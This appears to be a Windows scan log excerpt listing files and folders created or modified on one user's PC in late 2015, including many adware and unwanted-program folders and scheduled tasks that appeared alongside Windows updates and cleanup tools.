2015-12-29 16:02 - 2015-12-29 16:02 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsDatabase.dll
2015-12-29 15:54 - 2015-12-29 15:54 - 83947520 _____ C:\Windows\system32\config\SOFTWARE.iobit
2015-12-29 15:54 - 2015-12-29 15:54 - 00311296 _____ C:\Windows\system32\config\DEFAULT.iobit
2015-12-29 15:54 - 2015-12-29 15:54 - 00065536 _____ C:\Windows\system32\config\SAM.iobit
2015-12-29 15:54 - 2015-12-29 15:54 - 00028672 _____ C:\Windows\system32\config\SECURITY.iobit
2015-12-29 15:53 - 2015-12-29 16:27 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-29 15:52 - 2015-12-29 15:52 - 00002366 _____ C:\Windows\System32\Tasks\ASC8_SkipUac_hersheychoco9
2015-12-29 15:52 - 2015-12-29 15:52 - 00000250 _____ C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job
2015-12-29 15:11 - 2015-12-29 15:11 - 00000000 _____ C:\Users\hersheychoco9\Desktop\sfcdetails.txt
2015-12-29 14:35 - 2015-12-29 14:35 - 00000000 ____D C:\Windows\pss
2015-12-29 03:32 - 2015-12-29 03:32 - 00000529 _____ C:\Users\hersheychoco9\Desktop\UsbFix.lnk
2015-12-29 03:32 - 2015-12-29 03:32 - 00000000 ____D C:\UsbFix
2015-12-29 01:12 - 2015-12-29 01:12 - 00009084 _____ C:\WirelessDiagLog.csv
2015-12-28 23:37 - 2015-12-28 23:37 - 00000000 ____D C:\Windows\system32\uopu
2015-12-28 23:31 - 2015-12-28 23:44 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Opera Software
2015-12-28 23:31 - 2015-12-28 23:44 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Opera Software
2015-12-28 23:29 - 2015-12-28 23:29 - 00004006 _____ C:\Windows\System32\Tasks\LaunchPreSignup
2015-12-28 23:29 - 2015-12-28 23:29 - 00003588 _____ C:\Windows\System32\Tasks\Only-search Updater
2015-12-28 23:29 - 2015-12-28 23:29 - 00000000 ____D C:\Program Files (x86)\onlysearch
2015-12-28 23:27 - 2015-12-29 16:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
2015-12-28 23:27 - 2015-12-28 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WajaNetEn
2015-12-28 23:27 - 2015-12-28 23:27 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451366851-3310-8034-C4C04F343032
2015-12-28 23:26 - 2015-12-28 23:34 - 00000883 _____ C:\Windows\SysWOW64\${LOGFILE}
2015-12-28 23:25 - 2015-12-28 23:25 - 00000000 ____D C:\ProgramData\62f92eec-4927-1
2015-12-28 23:25 - 2015-12-28 23:25 - 00000000 ____D C:\ProgramData\62f92eec-4791-0
2015-12-28 23:17 - 2015-12-28 23:17 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2015-12-28 23:16 - 2015-12-28 23:16 - 00001520 _____ C:\ProgramData\tempimage.bmp
2015-12-28 23:09 - 2015-12-28 23:09 - 00023072 _____ C:\Windows\System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D}
2015-12-28 23:09 - 2015-12-28 23:09 - 00003304 _____ C:\Windows\System32\Tasks\IBUpd2
2015-12-28 23:09 - 2015-12-28 23:09 - 00000000 ____D C:\Program Files (x86)\PCAPDownloader
2015-12-28 23:08 - 2015-12-28 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\BrowserAir
2015-12-28 23:08 - 2015-12-28 23:08 - 00004784 _____ C:\Windows\SysWOW64\Comvud.ini
2015-12-28 23:08 - 2015-12-28 23:08 - 00003354 _____ C:\Windows\System32\Tasks\Ijufcyl
2015-12-28 23:08 - 2015-12-28 23:08 - 00002504 _____ C:\Windows\SysWOW64\ComvudOff.ini
2015-12-28 23:08 - 2015-12-28 23:08 - 00002504 _____ C:\Windows\system32\ComvudOff.ini
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\LocalLow\Company
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Tempfolder
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\uninst
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\ProgramData\33010bcc-5741-1
2015-12-28 23:08 - 2015-12-28 23:08 - 00000000 ____D C:\ProgramData\33010bcc-4455-0
2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ C:\Windows\system32\Comvud64.dll
2015-12-28 23:07 - 2015-12-29 06:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Seventh
2015-12-28 23:07 - 2015-12-28 23:07 - 00003522 _____ C:\Windows\System32\Tasks\Genius_Interval
2015-12-28 23:07 - 2015-12-28 23:07 - 00003304 _____ C:\Windows\System32\Tasks\Easy Driver Pro Schedule
2015-12-28 23:07 - 2015-12-28 23:07 - 00003208 _____ C:\Windows\System32\Tasks\Seventh
2015-12-28 23:07 - 2015-12-28 23:07 - 00003204 _____ C:\Windows\System32\Tasks\Genius
2015-12-28 23:07 - 2015-12-28 23:07 - 00003200 _____ C:\Windows\System32\Tasks\Sixth
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\Documents\Probit Software
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Sixth
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Genius
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\FunFeedr
2015-12-28 23:07 - 2015-12-28 23:07 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Common
2015-12-28 23:06 - 2015-12-29 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\Documents\DailyPCClean
2015-12-28 23:06 - 2015-12-28 23:06 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DailyPCClean
2015-12-28 23:05 - 2015-12-28 23:05 - 00000000 ____D C:\Windows\Update Pro
2015-12-28 23:05 - 2015-12-28 23:05 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\DhcpUpdater
2015-12-28 23:04 - 2015-12-28 23:13 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\TrailerTime
2015-12-28 23:04 - 2015-12-28 23:04 - 00003214 _____ C:\Windows\System32\Tasks\Pool Component
2015-12-28 23:04 - 2015-12-28 23:04 - 00003204 _____ C:\Windows\System32\Tasks\Pool Component2
2015-12-28 23:04 - 2015-12-28 23:04 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Pool Component
2015-12-28 23:04 - 2015-12-28 23:04 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451365457-3310-8034-C4C04F343032
2015-12-28 23:03 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files\WajaNetEn
2015-12-28 23:02 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\Probit Software
2015-12-28 23:02 - 2015-12-28 23:30 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\WTools
2015-12-28 23:02 - 2015-12-28 23:26 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Store
2015-12-28 23:01 - 2015-12-28 23:34 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Nosibay
2015-12-28 23:00 - 2015-12-29 06:00 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\NUIns
2015-12-28 23:00 - 2015-12-28 23:00 - 00000000 ____D C:\Program Files (x86)\4C4C4544-1451365214-3310-8034-C4C04F343032
2015-12-28 22:57 - 2015-12-28 23:37 - 00000000 ____D C:\Program Files (x86)\sushileads
2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-12-28 22:57 - 2015-12-28 22:57 - 00003534 _____ C:\Windows\System32\Tasks\SushiLeads
2015-12-28 22:57 - 2015-12-28 22:57 - 00002560 _____ C:\Users\hersheychoco9\AppData\Local\uninstall.exe
2015-12-28 22:55 - 2015-12-28 22:55 - 02669034 _____ C:\Users\hersheychoco9\Downloads\The+Men+of+Yoshiwara+Kiku.zip
2015-12-28 22:29 - 2015-12-28 22:29 - 00271609 _____ C:\Users\hersheychoco9\Downloads\[kat.cr]the.men.of.yoshiwara.kikuya.gyakuten.yoshiwara.visual.novel.english.torrent
2015-12-28 22:28 - 2015-10-29 14:02 - 00000015 _____ C:\Users\hersheychoco9\Downloads\USE PASSWORD - 12345.txt
2015-12-21 23:44 - 2015-12-21 23:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-20 02:01 - 2015-12-20 02:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bluetooth Devices
2015-12-10 19:26 - 2014-03-06 03:22 - 00134144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2015-12-10 19:25 - 2014-03-06 03:24 - 00111616 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
2015-12-10 19:25 - 2014-03-06 03:24 - 00033280 ____C (Microsoft Corporation) C:\Windows\system32\Drivers\hidusb.sys
2015-12-10 19:25 - 2014-03-06 03:19 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpipreg.sys
2015-12-09 13:49 - 2015-12-01 11:19 - 00826872 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-09 13:49 - 2015-12-01 11:19 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-09 13:37 - 2015-12-09 13:38 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-12-09 13:30 - 2015-11-22 00:59 - 07455064 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-12-09 13:30 - 2015-11-22 00:59 - 01735000 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-12-09 13:30 - 2015-11-22 00:59 - 01659568 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2015-12-09 13:30 - 2015-11-22 00:59 - 01519592 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2015-12-09 13:30 - 2015-11-22 00:59 - 01487008 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2015-12-09 13:30 - 2015-11-22 00:59 - 01355848 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2015-12-09 13:30 - 2015-11-22 00:58 - 01499920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2015-12-09 13:30 - 2015-11-21 12:32 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-12-09 13:30 - 2015-11-21 11:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2015-12-09 13:30 - 2015-11-21 10:59 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2015-12-09 13:30 - 2015-11-21 10:49 - 01344000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2015-12-09 13:30 - 2015-11-21 10:47 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2015-12-09 13:30 - 2015-11-21 10:40 - 00414208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2015-12-09 13:30 - 2015-11-11 10:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-12-09 13:30 - 2015-11-11 10:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-12-09 13:30 - 2015-11-11 09:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-12-09 13:30 - 2015-11-11 09:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2015-12-09 13:30 - 2015-11-11 09:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-12-09 13:30 - 2015-11-11 09:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-12-09 13:30 - 2015-11-09 18:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-12-09 13:30 - 2015-11-09 18:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-12-09 13:30 - 2015-11-09 18:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-12-09 13:30 - 2015-11-09 18:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-12-09 13:30 - 2015-11-09 18:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-12-09 13:30 - 2015-11-09 17:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-12-09 13:30 - 2015-11-09 17:41 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2015-12-09 13:30 - 2015-11-09 17:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-12-09 13:30 - 2015-11-09 17:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-12-09 13:30 - 2015-11-09 17:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-12-09 13:30 - 2015-11-09 17:36 - 00325632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-12-09 13:30 - 2015-11-09 17:25 - 01048576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2015-12-09 13:30 - 2015-11-09 17:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-12-09 13:30 - 2015-11-09 17:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-12-09 13:30 - 2015-11-09 17:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-12-09 13:30 - 2015-11-08 18:41 - 01540728 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-12-09 13:30 - 2015-11-08 16:30 - 04176384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-12-09 13:30 - 2015-11-08 16:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-12-09 13:30 - 2015-11-08 16:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-12-09 13:30 - 2015-11-08 16:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-12-09 13:30 - 2015-11-08 16:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-12-09 13:30 - 2015-11-08 16:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-12-09 13:30 - 2015-11-08 15:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-12-09 13:30 - 2015-11-08 15:32 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2015-12-09 13:30 - 2015-11-08 15:25 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2015-12-09 13:30 - 2015-11-08 15:23 - 01994752 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-12-09 13:30 - 2015-11-08 15:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-12-09 13:30 - 2015-11-08 15:16 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-12-09 13:30 - 2015-11-08 15:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-12-09 13:30 - 2015-11-08 15:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-12-09 13:30 - 2015-11-08 15:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-12-09 13:30 - 2015-11-08 15:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-12-09 13:30 - 2015-11-08 15:13 - 01383936 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-12-09 13:30 - 2015-11-08 15:01 - 01753600 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2015-12-09 13:30 - 2015-11-08 14:53 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2015-12-09 13:30 - 2015-11-08 14:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-12-09 13:30 - 2015-11-08 14:52 - 01559552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-12-09 13:30 - 2015-11-08 14:48 - 01376256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-12-09 13:30 - 2015-11-08 14:42 - 01490944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2015-12-09 13:30 - 2015-11-08 14:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-12-09 13:30 - 2015-11-08 14:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-12-09 13:30 - 2015-11-05 02:59 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2015-12-09 13:29 - 2015-11-20 16:47 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-12-09 13:29 - 2015-11-20 12:18 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-12-09 13:29 - 2015-11-20 10:58 - 03706880 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-12-09 13:29 - 2015-11-20 10:47 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-12-09 13:29 - 2015-11-20 10:46 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-12-09 13:29 - 2015-11-20 10:44 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2015-12-09 13:29 - 2015-11-20 10:44 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-12-09 13:29 - 2015-11-20 10:43 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-12-09 13:29 - 2015-11-20 10:42 - 02243584 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-12-09 13:29 - 2015-11-20 10:30 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-12-09 13:29 - 2015-11-20 10:29 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-12-09 13:29 - 2015-11-20 10:28 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-12-09 13:29 - 2015-11-20 10:27 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-12-09 13:29 - 2015-10-28 09:49 - 02775552 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2015-12-09 13:29 - 2015-10-28 09:29 - 02462720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2015-12-06 00:57 - 2015-07-30 08:04 - 00124624 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-12-06 00:57 - 2015-07-30 07:48 - 00103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
 
==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-05 17:08 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS
2016-01-05 17:06 - 2013-08-22 09:20 - 00000000 ____D C:\Windows\CbsTemp
2016-01-05 17:05 - 2014-11-21 23:28 - 00000930 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-05 16:56 - 2014-05-13 21:39 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2016-01-05 16:54 - 2014-05-13 21:18 - 00865408 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-05 16:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\Inf
2016-01-05 16:51 - 2015-03-11 08:30 - 00000000 ___DO C:\Users\hersheychoco9\OneDrive
2016-01-05 16:50 - 2015-09-21 21:29 - 00000000 ____D C:\ProgramData\ProductData
2016-01-05 16:50 - 2014-11-21 23:28 - 00000926 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-05 16:49 - 2014-10-10 07:49 - 00000318 _____ C:\Windows\system32\ayboot.ini
2016-01-05 16:48 - 2013-08-22 08:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-29 17:16 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\NDF
2015-12-29 17:12 - 2014-05-13 20:56 - 00000000 ____D C:\Windows\Panther
2015-12-29 17:06 - 2013-08-22 09:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2015-12-29 17:01 - 2014-10-10 05:14 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1030869394-3123877279-975090705-1001
2015-12-29 16:42 - 2014-10-10 08:41 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-29 15:59 - 2015-01-03 03:31 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Azureus
2015-12-29 15:49 - 2014-10-16 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\PCDr
2015-12-29 14:14 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Registration
2015-12-29 02:25 - 2014-11-21 18:42 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Adobe
2015-12-29 01:15 - 2014-10-10 05:40 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\ElevatedDiagnostics
2015-12-29 00:33 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\LocalLow\EmieUserList
2015-12-29 00:33 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\LocalLow\EmieSiteList
2015-12-29 00:23 - 2015-09-21 21:29 - 00000318 _____ C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job
2015-12-29 00:20 - 2015-09-21 21:29 - 00002434 _____ C:\Windows\System32\Tasks\Uninstaller_SkipUac_hersheychoco9
2015-12-28 23:43 - 2015-12-05 21:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll
2015-12-28 23:38 - 2013-08-22 08:44 - 05011720 _____ C:\Windows\system32\FNTCACHE.DAT
2015-12-28 23:36 - 2014-10-08 11:14 - 00000000 ____D C:\Users\hersheychoco9
2015-12-28 23:34 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\Local\EmieUserList
2015-12-28 23:34 - 2014-10-10 06:46 - 00000000 __SHD C:\Users\hersheychoco9\AppData\Local\EmieSiteList
2015-12-28 23:27 - 2013-08-22 07:25 - 00000226 _____ C:\Windows\win.ini
2015-12-28 23:14 - 2014-11-21 23:29 - 00002419 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-28 23:08 - 2014-10-08 11:15 - 00001628 _____ C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-12-28 22:29 - 2015-01-03 03:31 - 00000000 ____D C:\Users\hersheychoco9\Documents\Vuze Downloads
2015-12-28 22:28 - 2015-01-03 03:31 - 00000000 ____D C:\Program Files\Vuze
2015-12-28 19:33 - 2014-10-19 20:11 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Skype
2015-12-25 20:51 - 2015-05-14 19:14 - 00000000 ____D C:\Users\hersheychoco9\AppData\Roaming\Curse Client
2015-12-23 23:38 - 2015-02-18 23:09 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Steam
2015-12-21 23:44 - 2015-08-22 10:12 - 00002713 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:44 - 2014-10-19 20:11 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-21 23:44 - 2014-10-19 20:11 - 00000000 ____D C:\Users\hersheychoco9\AppData\Local\Skype
2015-12-21 23:44 - 2014-10-19 20:10 - 00000000 ____D C:\ProgramData\Skype
2015-12-20 01:43 - 2015-05-01 20:00 - 00000132 _____ C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
2015-12-20 00:44 - 2013-08-22 07:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2015-12-17 20:08 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\rescache
2015-12-13 19:52 - 2014-05-13 21:21 - 00000000 ____D C:\ProgramData\Dell
2015-12-09 13:38 - 2013-08-22 13:12 - 00000000 ____D C:\Program Files\Windows Journal
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ___SD C:\Windows\system32\dsc
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ___RD C:\Windows\ToastData
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\WinStore
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\setup
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\migwiz
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\Com
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\WinBioPlugIns
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\setup
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\SecureBootUpdates
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\migwiz
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\system32\Com
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\MediaViewer
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\IME
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\FileManager
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Camera
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Portable Devices
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2015-12-09 13:38 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Common Files\System
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\oobe
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\Dism
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Sysprep
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\oobe
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Dism
2015-12-09 13:38 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\servicing
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\SysWOW64\InputMethod
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2015-12-09 13:37 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-12-09 13:34 - 2015-12-05 23:20 - 00000000 ____D C:\Windows\system32\MRT
2015-12-09 13:27 - 2015-12-05 23:20 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe

==================== Files in the root of some directories =======

2014-10-10 07:45 - 2014-10-09 17:10 - 27674200 _____ () C:\Program Files (x86)\Roboscan_IS_Free.exe
2015-05-01 20:00 - 2015-12-20 01:43 - 0000132 _____ () C:\Users\hersheychoco9\AppData\Roaming\Adobe PNG Format CS5 Prefs
2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
